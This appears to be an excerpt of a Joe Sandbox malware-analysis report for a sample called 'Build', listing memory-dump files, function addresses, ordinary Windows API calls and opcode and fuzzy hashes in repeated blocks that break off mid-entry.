Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: bf7e33ff6cdfeac23fe3a07e0a158df82b806a459b58866c8a5b986b234b7fdd
Instruction ID: b58212dc0f535ecfd78c92d30fc100a0c5bd206aa21d46b87c4a6983556ca994
Opcode Fuzzy Hash: bf7e33ff6cdfeac23fe3a07e0a158df82b806a459b58866c8a5b986b234b7fdd
Instruction Fuzzy Hash: 1FD05B1170912155DB163B2678067FE39165FCA31BF49107BB149772C38B9E5C4292EF

Function 0043C5B6 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 0043C5BC

Part of subcall function 0043C34D: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0043C36E

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction ID: 6ba1c5c8701bd988739d20e24f5430b768f99fc969a484f8389c716df79abc69
Opcode Fuzzy Hash: bb184948fac70443b701d804218a49dfe2ebbc7c187f1a67eea2f7faab0ba8dc
Instruction Fuzzy Hash: B2D0A730200208B6DF012B61CC0297E7595DB04344F0080277C01E5190EEB9DA506B55

Function 0044017F Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 004401A4

Part of subcall function 0043D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0043D875
Part of subcall function 0043D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0043D886
Part of subcall function 0043D864: IsDialogMessageW.USER32(00020494,?), ref: 0043D89A
Part of subcall function 0043D864: TranslateMessage.USER32(?), ref: 0043D8A8
Part of subcall function 0043D864: DispatchMessageW.USER32(?), ref: 0043D8B2

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: fa2b44e1fb8689a5a4e3d96d3a3f1fe8f6555800957d3c7ca1f0adfdec628d32
Instruction ID: 2a3a5000f82778be32abb25bc109b24ff2661bb51ee348795a92cfa806cca48c
Opcode Fuzzy Hash: fa2b44e1fb8689a5a4e3d96d3a3f1fe8f6555800957d3c7ca1f0adfdec628d32
Instruction Fuzzy Hash: 33D0C731148300BBD6012B52DE06F1E7AE2BB9DF09F005959F384340F1C6A2DD31AB1E

Function 00440A98 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00440AC0

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 3bf89108de99877a5e49dde9e565dcd80c1da2f012f53e5a15a3de8dee299133
Instruction ID: 2e0b8ff04051b5cac4591f4f8ce10ec4fd51db48a18aed105dea4a53b7402904
Opcode Fuzzy Hash: 3bf89108de99877a5e49dde9e565dcd80c1da2f012f53e5a15a3de8dee299133
Instruction Fuzzy Hash: 5FD0C97050575499F215BB64AC8F76932D0B35870CB94481BBB05A5295CBBCA4B0870E

Function 004311EB Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 004311F5

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 393e808519c642e96e553778c0de8965191e65f8a5b8809f96153b0c0607a44f
Instruction ID: 8b0d9581338958fa6edc75f0c0327d421f2b65a552431c89afa8f18b08a558b4
Opcode Fuzzy Hash: 393e808519c642e96e553778c0de8965191e65f8a5b8809f96153b0c0607a44f
Instruction Fuzzy Hash: 0ED0CA70414222CFD7A08F38E808782BBE0AF0C311B22883EA0CAC2260E6749880CF44

Function 0042B288 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,0042B18A,?,?,?,00000000,0042B662,?,?,00000000,?,?), ref: 0042B294

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 33e20eb3e7cb3c0c8add4078a70f1e404c6be7d6db81d321a869afb7137aa83f
Instruction ID: b51473b4f9007a0ca1491ee27f538b05f40e9ffadc8e5b99da369f60bb8b7e31
Opcode Fuzzy Hash: 33e20eb3e7cb3c0c8add4078a70f1e404c6be7d6db81d321a869afb7137aa83f
Instruction Fuzzy Hash: FFC01234100314D54E304628B84D05E7311DE523777F482D5C068851A2C327CC83E668

Function 0044067C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8304606a149875a8090b66f42f6560352e7fcd893863603bc83e224d34e4ae9c
Instruction ID: 2209854f176b3eb4b9f7aae1d49331766fff7269a735938e61e7f53ac426f96b
Opcode Fuzzy Hash: 8304606a149875a8090b66f42f6560352e7fcd893863603bc83e224d34e4ae9c
Instruction Fuzzy Hash: 5EB09286659402BD31242195591683E0108D0C0B15331892BF505C0441986C5C29103F

Function 004406C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d15a49a8f7ed49a0a6019bf706dff1945db08eb83c9e1e3e7f139be72245d943
Instruction ID: cf469342c5bf22d0222584d70eb6e28cc04f388b26a6ff07de5b1eb8071b8606
Opcode Fuzzy Hash: d15a49a8f7ed49a0a6019bf706dff1945db08eb83c9e1e3e7f139be72245d943
Instruction Fuzzy Hash: A4B0928A259502AC311461995956D3F0108D0C0B15331882BF509C0641986C5C29023B

Function 004406D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a098e200d6c1eef410130404edaa93f0cf7271a5de448ab39782e874b9d1d083
Instruction ID: 057fac0ad612a78faeacfac7fd1074f595e8505995e001ae9b3408660e13caaa
Opcode Fuzzy Hash: a098e200d6c1eef410130404edaa93f0cf7271a5de448ab39782e874b9d1d083
Instruction Fuzzy Hash: E5B09286259402AC311865995D1693E0108C0C0B15331C82BF909C0641D86C5C2D013B

Function 004406DD Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 717fbfac16fc3e519eccce95febad0464efecbb5cc46a1ef3e7bc02543a995ea
Instruction ID: 40b071fc430485d4e1453f13a60237fc787f313f06fcdbbdba6094be4e8a83cf
Opcode Fuzzy Hash: 717fbfac16fc3e519eccce95febad0464efecbb5cc46a1ef3e7bc02543a995ea
Instruction Fuzzy Hash: 0AB012C635D542AC325871995D16D3F010CC0C0B15331CD3FF509C0641D86C5C6D023F

Function 004406E7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aecde4e5f2acba4f6159dc3bdf1c5abb1343da5096bf42e488a08132268fdbcf
Instruction ID: b46a121627c47539a6f6cfe5d4c478d5f3350711abd5195b2ef3bc6a1fb4bfb6
Opcode Fuzzy Hash: aecde4e5f2acba4f6159dc3bdf1c5abb1343da5096bf42e488a08132268fdbcf
Instruction Fuzzy Hash: D1B09286259402AC311861995A1693E0108D0C0B15331C82BF909C0641D86C5C2E013B

Function 004406F1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ca3b34fb51752c6fd038a0bb021209c5071712a1a72a92b33a61b6d18487f79c
Instruction ID: 36eae6127a7217aad9e32859600741f224e8942440537d50a52af1c1b0f54ccb
Opcode Fuzzy Hash: ca3b34fb51752c6fd038a0bb021209c5071712a1a72a92b33a61b6d18487f79c
Instruction Fuzzy Hash: ABB09286259402AC311861A9591693E0108D0C0B15331CC2BF509C0641D86C5C2D013B

Function 004406FB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d98222323a1f78bb1537c09345869d64dcb8c803e247c3cc2ae420b79ba1ea7b
Instruction ID: 865620d3d20c7432d9a325f3f02f61443a371eed17f1e458053dfe0bcc2753a8
Opcode Fuzzy Hash: d98222323a1f78bb1537c09345869d64dcb8c803e247c3cc2ae420b79ba1ea7b
Instruction Fuzzy Hash: 57B012D639D402AC311475995D16D3F010CC0C0B15331CC3FF909C0541D86C5C2D013F

Function 00440697 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6a16de15ec46dd87027d46f39f07a801840e629bf3d6f2af68ba59366dab400d
Instruction ID: 5a866eda7ac07198a030ef75f900e9525532545a850b4d76c8f846cef481117c
Opcode Fuzzy Hash: 6a16de15ec46dd87027d46f39f07a801840e629bf3d6f2af68ba59366dab400d
Instruction Fuzzy Hash: E5B09286259402AC311462999A1693E0118C0C0B153318A2BF909C0541996C5C2A013F

Function 004406A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f38cf303e3aee79491173675837d21c649d24b6a7dcff2a132a9db9cadd86bc4
Instruction ID: 4727a78468159bb1f9b7b6b480aaf37d9acfd2e379f3896910c383ab73762b81
Opcode Fuzzy Hash: f38cf303e3aee79491173675837d21c649d24b6a7dcff2a132a9db9cadd86bc4
Instruction Fuzzy Hash: C6B09286269502AC31146299991693E0118D0C0B15331892BF509C0541996C5C29013F

Function 004406AB Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8b9662a8adb2c6a36d4f2f8073ade5bf6d80e732ef71160be509d4b17df9fa87
Instruction ID: 7e6e8d117e1c2a3292569291891fff6040774bc7cade078de5d52fc8ca193775
Opcode Fuzzy Hash: 8b9662a8adb2c6a36d4f2f8073ade5bf6d80e732ef71160be509d4b17df9fa87
Instruction Fuzzy Hash: 87B012CA35D502AC311471995D56D3F010CC0C0B15331CC3FF909C0641D86C6C2D013F

Function 004406B5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0044068E

Part of subcall function 00440D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00440DAD
Part of subcall function 00440D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00440DBE

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c3873fdca2ac3e6e914cb247788815083a8a10f6376dfe32a0b9cd342c849947
Instruction ID: 960c4a2a61f83640adbc1ef128391125f30745ebeef2b8e793123b50daec33a5
Opcode Fuzzy Hash: c3873fdca2ac3e6e914cb247788815083a8a10f6376dfe32a0b9cd342c849947
